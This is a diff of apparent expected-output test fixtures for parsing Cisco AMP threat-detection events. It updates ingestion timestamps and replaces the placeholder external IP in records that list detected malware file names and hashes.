@@ -1542,8 +1542,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174545241Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337142200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1565,7 +1565,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1612,7 +1612,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1626,8 +1626,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174547286Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337148100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1649,7 +1649,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1696,7 +1696,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1710,8 +1710,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174549297Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337153900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1733,7 +1733,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1792,7 +1792,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1809,8 +1809,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174551390Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", + "ingested": "2021-12-09T13:35:36.337159700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -1832,7 +1832,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1883,7 +1883,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1897,8 +1897,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174553415Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337165500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1920,7 +1920,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1979,7 +1979,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1996,8 +1996,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174555596Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", + "ingested": "2021-12-09T13:35:36.337170800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -2019,7 +2019,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2070,7 +2070,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2084,8 +2084,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174557637Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337174700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2107,7 +2107,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2166,7 +2166,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2183,8 +2183,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174559708Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat 